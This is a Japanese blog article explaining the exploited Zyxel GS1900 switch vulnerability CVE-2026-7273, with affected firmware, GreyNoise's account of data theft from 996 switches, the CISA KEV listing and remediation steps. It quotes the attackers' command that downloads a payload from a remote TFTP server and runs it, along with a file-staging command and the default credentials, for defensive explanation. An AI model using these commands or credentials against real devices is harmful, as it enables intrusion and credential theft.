
Zyxel GS1900 スイッチの CVE-2026-7273 - 未認証で設定と root 資格情報を抜かれる悪用が CISA KEV 入り、対応手順の整理
VLANやTFTPなどL2/L3の基礎を確認できる定番。
侵害が疑われる機器の保全と調査の進め方を学べる。
攻撃者の手口を手元で再現して理解を深められる。
当サイトは Amazon.co.jp を宣伝しリンクすることで紹介料を得る手段を提供する、Amazonアソシエイト・プログラムの参加者です。価格・在庫はリンク先の最新情報をご確認ください。
はじめに
台湾のネットワーク機器メーカーZyxelは2026年6月16日、GbEスマートマネージドスイッチ「GS1900シリーズ」のファームウェアに含まれるCGIプログラムに、スタックベースのバッファオーバーフロー脆弱性CVE-2026-7273があるとしてアドバイザリと修正ファームウェアを公開しました。LANから到達できる未認証の攻撃者が、細工したHTTPリクエストでOSコマンドを実行できる可能性があるというものです。
公開から約2か月後の8月17日ごろから、この脆弱性は実際の攻撃に使われていました。脅威インテリジェンス企業のGreyNoiseは9月21日、中国語話者と疑われる攻撃者が48か国996台のGS1900スイッチから設定ファイル・ネットワーク情報・ハッシュ化されたroot権限の資格情報を持ち出したと報告しています。同日、米CISAはCVE-2026-7273をKnown Exploited Vulnerabilities(KEV)カタログに追加し、連邦民間機関の対応期限を2026年9月24日としました。
本記事では、Zyxelのアドバイザリ、NVD、CISA KEVのJSONフィード、GreyNoiseの報告を一次情報として、脆弱性の中身と攻撃の流れ、実務での対応手順を整理します。SSH経由で未認証乗っ取りされたMikroTik RouterOSのMikroTrickと同様、「ネットワーク機器の管理面が攻撃の入口になる」典型例です。
WARNING
GS1900シリーズは小規模オフィスや店舗、家庭で使われることが多い価格帯のスイッチで、管理画面の存在を意識しないまま運用されているケースも少なくありません。GreyNoiseの報告では、侵害された996台のうち564台が工場出荷時のデフォルト資格情報のままでした。ファームウェアの更新と合わせて、管理画面の露出とパスワードの状態を確認してください。
概要(早見表)
| 項目 | 内容 |
|---|---|
| CVE | CVE-2026-7273 |
| 対象製品 | Zyxel GS1900シリーズ スイッチ(10モデル) |
| 脆弱性の種類 | CGIプログラムのスタックベースバッファオーバーフロー(CWE-121) |
| 前提条件 | LANから管理用HTTPに到達できること。認証は不要 |
| 影響 | 細工したHTTPリクエストによるOSコマンド実行 |
| CVSS 3.1 | 8.8(High)。ベクタは AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H(CNAであるZyxelの評価) |
| 報告者 | 中国科学院ソフトウェア研究所(ISCAS)のLei Gu、Jun Cao、Zhiqing Rui、Jingzheng Wu、Tianyue Luoの各氏 |
| Zyxelのアドバイザリと修正版の公開 | 2026年6月16日 |
| 実際の攻撃 | GreyNoiseが確認。2026年8月17日ごろから。48か国996台から情報を窃取 |
| CISA KEV | 2026年9月21日に追加。対応期限は2026年9月24日。forensicTriageはYes |
CVSSベクタの攻撃元区分がAV:A(隣接ネットワーク)となっている点は注意が必要です。Zyxelのアドバイザリも「LANベースの攻撃者」と表現しています。ただし、後述するとおりGreyNoiseは世界48か国の機器から実際にデータが持ち出されたと報告しており、管理画面がインターネットや信頼できないセグメントに晒されていれば「LANベース」という前提は防御になりません。
影響モデルと修正ファームウェア
Zyxelのアドバイザリに記載された影響モデルと修正版の一覧です。修正版はいずれも、既存の2.90系ファームウェアのパッチ番号を「.1」から「.2」に上げたものです。
| モデル | 影響を受けるバージョン | 修正版 |
|---|---|---|
| GS1900-8 | 2.90(AAHH.1)C0 以前 | 2.90(AAHH.2)C0 |
| GS1900-8HP | 2.90(AAHI.1)C0 以前 | 2.90(AAHI.2)C0 |
| GS1900-10HP | 2.90(AAZI.1)C0 以前 | 2.90(AAZI.2)C0 |
| GS1900-16 | 2.90(AAHJ.1)C0 以前 | 2.90(AAHJ.2)C0 |
| GS1900-24 | 2.90(AAHL.1)C0 以前 | 2.90(AAHL.2)C0 |
| GS1900-24E | 2.90(AAHK.1)C0 以前 | 2.90(AAHK.2)C0 |
| GS1900-24EP | 2.90(ABTO.1)C0 以前 | 2.90(ABTO.2)C0 |
| GS1900-24HPv2 | 2.90(ABTP.1)C0 以前 | 2.90(ABTP.2)C0 |
| GS1900-48 | 2.90(AAHN.1)C0 以前 | 2.90(AAHN.2)C0 |
| GS1900-48HPv2 | 2.90(ABTQ.1)C0 以前 | 2.90(ABTQ.2)C0 |
「以前」には2.90より古い系列も含まれます。GreyNoiseが解析した攻撃ツールは、GS1900-24の2.10から2.90までのバージョンを明示的に標的にしており、コマンドラインオプションで他のバージョンにも対応できる作りでした。古いファームウェアのまま使っている機器ほど狙われやすいと考えるべきです。
なお、NVDに登録されている説明文は「GS1900-48HPv2の2.90(ABTQ.1)C0まで」と1モデルだけを挙げていますが、Zyxelのアドバイザリでは上記10モデルすべてが対象です。NVDの説明文だけを見て自分のモデルは無関係だと判断しないでください。
脆弱性の技術的な仕組み
Zyxelのアドバイザリは、脆弱性の所在を「GS1900シリーズのファームウェアのCGIプログラム」とだけ記しており、どのCGIのどのパラメータで境界チェックが欠けていたのかは公表していません(未確認)。以下は、公開情報から読み取れる範囲の整理です。
GS1900シリーズの管理画面(Web Configurator)は、ブラウザからHTTPまたはHTTPSでアクセスし、画面上の操作をCGIプログラムが受け取って処理する構造です。CWE-121(スタックベースのバッファオーバーフロー)に分類されていることから、HTTPリクエストの中の何らかの入力値を、長さを検証せずにスタック上の固定長バッファへコピーしていたと考えられます。スタック上のバッファを溢れさせると、関数の戻りアドレスなどの制御データを書き換えられるため、条件が整えば任意のコードやOSコマンドの実行につながります。
重要なのは、この処理が認証の前に到達できる点です。CVSSベクタのPR:N(権限不要)とアドバイザリの「未認証」という記述が示すとおり、攻撃者は管理画面のパスワードを知らなくても、管理用IPアドレスにHTTPで届きさえすればコマンドを実行できます。GreyNoiseの報告にある攻撃ツールも「事前認証のリモートコード実行」として動作していました。
GreyNoiseが報告した攻撃コマンドがsh -cやcp、/bin/shといったシェルの機能をそのまま使っていること、そしてハッシュ化されたroot資格情報が持ち出されたことから、CGIから実行されたコマンドは機器上の設定ファイルやアカウント情報を読み出せる権限で動いていたと読み取れます。どのユーザー権限でCGIが動作しているかは公表されていません(未確認)。
悪用状況
| 日付 | 出来事 | 出典 |
|---|---|---|
| 2026年6月16日 | Zyxelがアドバイザリと修正ファームウェアを公開。NVDにも同日登録 | Zyxel、NVD |
| 2026年8月17日ごろ | 攻撃者がCVE-2026-7273の悪用を開始 | GreyNoise |
| 2026年9月21日 | GreyNoiseが攻撃キャンペーン「Kapibala」の報告を公開 | GreyNoise |
| 2026年9月21日 | CISAがCVE-2026-7273をKEVに追加(対応期限9月24日) | CISA |
GreyNoiseが観測した攻撃の流れ
GreyNoise Labs(Andrew Thompson氏、Mark Mager氏)は、同社のセンサー網であるGlobal Observation Gridで長期間観測してきた攻撃者について、2026年6月から9月にかけての活動をまとめた報告を公開しました。WordPress、Gitea、UniFi OS、Linuxカーネルなど十数件の脆弱性を並行して悪用しており、西側の政府機関から18,000件超の記録を盗んだ事例も含まれます。GS1900の悪用はその一部です。
GS1900に対する攻撃で使われたのは、商用の難読化ツールPyArmorで強く難読化されたPythonスクリプトでした。ただし攻撃者は、2021年リリースの古いバージョンであるPyArmor 6.7.5に固定するランタイムを残したままにしていたため、GreyNoiseは難読化を解除して解析できました。スクリプトはCVE-2026-7273を使って事前認証のリモートコード実行を行い、次のようなコマンドを機器に実行させます。
sh -c tftp -gr c -l /1 <REDACTED> 6969;/bin/sh /1これは、機器に内蔵されたTFTPクライアントを使って攻撃者のTFTPサーバー(ポート6969)からcというファイルを取得し、/1として保存してシェルで実行する、という流れと読み取れます。GS1900シリーズはファームウェア更新や設定バックアップにTFTPを使う機能を持っているため、TFTPクライアントが機器に最初から入っています。攻撃者は、この正規の機能を二次ペイロードのダウンロードに転用したことになります。
取得されたcはカスタムの情報収集(collector)スクリプトで、機器の偵察を行い、集めたデータを次のコマンドで退避していました。
cp /tmp/info /home/web/tmp/info.txt/home/web/tmp/はWebサーバーから参照できるディレクトリで、ここに置いたファイルはHTTP経由で取り出せます。つまり攻撃者は、TFTPでスクリプトを送り込み、結果をWeb経由で回収するという単純な構成で、大量の機器から自動的にデータを集めていました。
持ち出されたデータと被害の規模
GreyNoiseによると、攻撃者は48か国996台のGS1900スイッチの侵害と情報の持ち出しに成功しました。国別ではイタリア(133台)、米国(129台)、台湾(123台)、フランス(90台)、韓国(69台)が上位です。持ち出されたのは、機器の設定、ハッシュ化されたroot権限の資格情報、ネットワーク情報です。collectorスクリプトが具体的にどのファイルを読んだのかは報告に書かれていません(未確認)。
被害機器のうち564台は工場出荷時のデフォルト資格情報のままでした。GS1900シリーズのユーザーガイドでは、デフォルトのログインはadmin/1234、管理IPは192.168.1.1です。半数以上の機器がこの状態で、しかも攻撃者の手が届く場所に置かれていたことになります。
攻撃者について
GreyNoiseは、攻撃ツールに大量の中国語コメントが含まれていたことと活動時間帯から、この攻撃者を「中国語話者で、UTC+8で活動している可能性がある」としています。また、C2ドメイン、マルウェアファミリー、TTPの重なりから、Acronisが「Red Heron」として報告したグループと同一または関連があるとしています。国家の関与や具体的な組織名までは特定されていません(未確認)。
CISA KEVのJSONフィード(カタログバージョン2026.09.22)を2026年9月23日に確認したところ、CVE-2026-7273のエントリはフォレンジック調査を求めるforensicTriageがYes、knownRansomwareCampaignUseはUnknownでした。CISAの必須対応は「ベンダーの指示に従って緩和策を適用し、緩和策が利用できない場合は製品の使用を中止する」です。
対策と確認手順
以下の画面名とメニューパスは、Zyxelが公開しているGS1900シリーズのユーザーガイド(バージョン2.80、2023年10月版)に記載のものです。ファームウェアのバージョンによって表示が異なる場合があります。CLIによる手順は公式ドキュメントで確認できなかったため記載していません。
1. ファームウェアのバージョンを確認して更新する
まず、管理画面のMonitor > System > Information > System Informationで現在のファームウェアバージョンを確認します。前述の表の修正版(各モデルの「.2)C0」)より古ければ更新が必要です。
更新の前に、Maintenance > Configuration > Backupで現在の設定(running または startup)とログをローカルに保存しておきます。Zyxelのコミュニティで同社の担当者が公開している更新ガイドでも、更新前に設定のバックアップを取ること、更新中(5〜15分)は電源を切らないこと、完了後に自動で再起動することが案内されています。
更新はMaintenance > Firmware > Uploadで行います。ユーザーガイドの手順は次のとおりです。
- Zyxelのダウンロードページから、自分のモデル向けの修正版ファームウェアを入手して展開する(拡張子は.bix)
- Methodで「HTTP」を選ぶ
- Imageで「Active」(現在起動しているパーティション)または「Backup」を選ぶ
- File PathのBrowseでファームウェアファイルを指定し、Applyを押す
- 完了後、System Infoの画面でバージョンが上がったことを確認する
ユーザーガイドには「別モデルのファームウェアを書き込むと機器を壊すことがある」との注意があります。モデル名の末尾(HP、E、EP、v2)まで確認してください。GS1900シリーズはActiveとBackupの2つのイメージを持ち、Maintenance > Firmware > Managementでどちらを起動するかを選べます。Backup側に書き込んだ場合は、この画面で切り替えて再起動しないと修正版は有効になりません。
古いファームウェア(2.20など)では、最近のブラウザで管理画面が正しく表示されないことがあり、Zyxelは代わりにZyxel ONE Network Utility(ZON)を使った更新を案内しています。2.20から2.90への直接更新は可能とされています。
2. 管理画面の露出を減らす
CVE-2026-7273は未認証で悪用できるため、更新するまでの間も、更新した後も、管理用HTTP/HTTPSに誰が到達できるかが最大の論点です。
- 管理VLANの分離: Configuration > System > IP > IPv4のManagement VLANで管理用VLANを指定できます。ユーザー端末やゲスト、IoT機器と同じセグメントから管理画面に届く構成は避け、管理用のVLANに閉じます。
- 送信元IPの制限: Configuration > Management > Remote Access Controlでは、送信元IPv4アドレス/マスクとサービス(HTTP、HTTPS、SNMP)の組み合わせで、管理アクセスをPermit/Denyするプロファイルを最大16件設定できます。管理端末のアドレスだけをPermitし、それ以外をDenyする構成にします。
- HTTPの無効化: Configuration > Management > HTTP/HTTPSでHTTPを無効にし、HTTPSのみにします。ただし、脆弱性はCGIプログラム側にあり、HTTPSでも同じCGIに到達すると考えられるため、これは平文通信を避ける意味の対策で、本脆弱性の緩和策にはなりません(HTTPSで悪用できるかどうかは未確認)。
- インターネットからの到達を遮断: 上流のルーターやファイアウォールで、スイッチの管理IPに対する外部からのHTTP/HTTPSを止めます。ポート転送やUPnPで意図せず公開されていないかも確認します。
3. 侵害の痕跡を確認する
KEVのforensicTriageがYesであるとおり、CISAは更新前に侵害の有無を確認するよう求めています。GreyNoiseは機器側のIoCを公開していないため、確認できるのは攻撃の構造から導ける以下の点です。
- スイッチからの外向きTFTP通信: スイッチが自分から外部のIPアドレスにUDP/69や、報告にあった6969番ポートなど不審なポートへ接続した記録がないか、上流のファイアウォールやフローのログで確認します。通常運用でスイッチが外部のTFTPサーバーに接続することはありません。
- 管理画面への未知の送信元からのアクセス: 8月中旬以降、スイッチの管理IPに対して見覚えのない送信元からHTTPリクエストが届いていないかを確認します。GS1900シリーズはConfiguration > Management > Syslogでリモートのsyslogサーバーに送る設定ができますが、機器内のログは再起動で消えることがあるため、調査対象の機器では更新の前にMaintenance > Configuration > Backupでログ(flashとbuffer)を退避してください。
- 不審なファイルの有無: 攻撃で使われた
/1や/home/web/tmp/info.txtの存在は、機器のシェルにアクセスできる場合にしか確認できません。管理画面からファイルシステムを確認する手段は公式ドキュメントで確認できなかったため、ここでは手順を示しません。 - 設定と利用者の変更: Configuration > Management > Usersに見覚えのないアカウントが追加されていないか、SNMPコミュニティやsyslog送信先など、外部に情報を流す設定が変わっていないかを確認します。
痕跡が見つからなくても、8月17日以降に管理画面が信頼できないネットワークから到達可能だった機器は、侵害された前提で次の手順を進めるのが安全です。
4. 資格情報のローテーションと設定の見直し
攻撃者が持ち出したのは、機器の設定ファイルとハッシュ化されたroot資格情報です。これらから何が漏れるかを考えると、やるべきことが決まります。
- 管理者パスワードの変更: Configuration > Management > Usersで、adminを含む全アカウントのパスワードを変更します。デフォルトの
1234のままなら最優先です。ハッシュ化されていても、弱いパスワードはオフラインで解析され得ます。 - 設定ファイルに含まれる他のシークレット: ユーザーガイドによると、Users画面のEncryptionを「Clear Text」にしていると、バックアップした設定ファイルにパスワードが平文で入ります。Encryptedにしていたかどうかを確認し、平文だった場合はそのパスワードを他の機器やサービスで使い回していないかも点検します。SNMPのコミュニティ文字列、RADIUS/TACACS+の共有シークレット、syslogやTFTPサーバーのアドレスなど、設定に含まれる情報はすべて「攻撃者に知られた」前提で更新します。
- ネットワーク情報の漏えいへの備え: VLAN構成やIPアドレス、接続先の情報は、次の侵入の下調べに使われます。すぐに変えられるものではありませんが、そのセグメントに置かれた他の機器(特に管理画面を持つルーターやNAS)のパスワードと更新状況を見直す機会にしてください。
- 侵害が確実な場合: 修正版のファームウェアを適用したうえで、Maintenance > Configuration > Factory Defaultで工場出荷状態に戻し、検証済みの設定から再構築します。侵害後に取ったバックアップをそのまま復元すると、攻撃者の変更が残る可能性があります。
この件から読み取れること
「LANベース」は安心材料にならない: CVSSのAV:Aという評価は、あくまで管理画面がLANの内側に閉じている前提での話です。ISPからの貸与機器や小規模拠点では、管理画面が意図せず外に見えていることがあります。GreyNoiseの数字が示すのは、その前提が崩れた機器が世界に1,000台近くあったという事実です。SonicWall SMA1000やCisco FMCのハードコードされたパスワードの件と同じく、管理面をどこから触れるかが、脆弱性の深刻度以上に被害を左右します。
デフォルト資格情報の放置はハッシュ窃取と組み合わさると致命的: 被害機器の半数以上がデフォルトのパスワードでした。ハッシュを持ち出されても強いパスワードなら時間を稼げますが、1234では解析にかかる時間はほぼゼロです。機器の導入時にパスワードを変える運用ができているかを、改めて棚卸しする価値があります。
攻撃者は機器に最初から入っている道具を使う: TFTPクライアントもWeb公開ディレクトリも、GS1900の正規の機能です。攻撃者はマルウェアを持ち込まず、既存の道具だけでダウンロードと回収を完結させました。EDRの入らない組み込み機器では、機器の外側(ファイアウォール、フローログ、DNS/TFTPの通信)で異常を捉える設計が必要です。
修正から悪用まで2か月、KEV入りまで3か月: Zyxelの修正は6月16日、悪用開始は8月17日ごろ、KEV追加は9月21日でした。KEVに載ってから対応するのでは遅く、今年の国内インシデントを見ても、ネットワーク機器のアドバイザリは公開時点で対応を始める前提に切り替えるべき段階に来ています。
まとめ
- Zyxel GS1900シリーズ10モデルのCGIプログラムに、未認証でOSコマンドを実行できるスタックベースのバッファオーバーフロー CVE-2026-7273(CVSS 3.1で8.8、CWE-121)があり、Zyxelは2026年6月16日に各モデルの2.90(xxxx.2)C0で修正しました。
- GreyNoiseの報告によると、中国語話者と疑われる攻撃者が8月17日ごろから悪用し、内蔵TFTPクライアントでcollectorスクリプトを送り込む手口で、48か国996台から設定・ネットワーク情報・ハッシュ化root資格情報を窃取しました。564台はデフォルト資格情報のままでした。
- CISAは9月21日にKEVへ追加し、対応期限を9月24日、forensicTriageをYesとしています。
- 対応は、Monitor > System > Informationでのバージョン確認、Maintenance > Firmware > Uploadでの更新、Management VLANとRemote Access Controlによる管理面の分離、外向きTFTP通信と管理画面へのアクセス記録の確認、全アカウントのパスワードと設定内のシークレットの更新です。
- 脆弱なCGIの詳細、collectorスクリプトが読み出したファイル、HTTPSでの悪用可否、攻撃者の具体的な組織は未確認です。
参考リンク
- Zyxel security advisory for stack-based buffer overflow vulnerability in GS1900 series switches(Zyxel、2026年6月16日)
- CVE-2026-7273(NVD)
- CISA Adds One Known Exploited Vulnerability to Catalog(CISA、2026年9月21日)
- Known Exploited Vulnerabilities Catalog(CISA)
- BOD 26-04: Prioritizing Security Updates Based on Risk(CISA)
- BOD 26-04 Implementation Guidance(CISA)
- Open Season on Kapibala: Attacker Steals Government Records via WordPress Exploitation(GreyNoise Labs、2026年9月21日)
- Attacker compromised nearly 1000 Zyxel switches since August (CVE-2026-7273)(Help Net Security)
- GS1900 Series User's Guide Version 2.80(Zyxel、PDF)
- GS1900-24 Firmware Upgrade Guide: Upgrading from v2.20 directly to Latest v2.90(Zyxel Community)
- Zyxel Download Library(Zyxel)
- MikroTik RouterOS の MikroTrick - SSH経由で未認証乗っ取りされる CVE-2026-67276/86060 と CISA KEV 追加への対応
- SonicWall SMA1000 の CVE-2026-83548 / CVE-2026-83549 - CVSS 10.0 のSSRFと連鎖RCE
- Cisco FMC のハードコード認証情報 CVE-2026-20316 - 実際に悪用された「静的パスワード」から学ぶこと
- 2026年 日本のセキュリティインシデントまとめ - 1月のマイナビ・東海大からKDDI1422万件まで


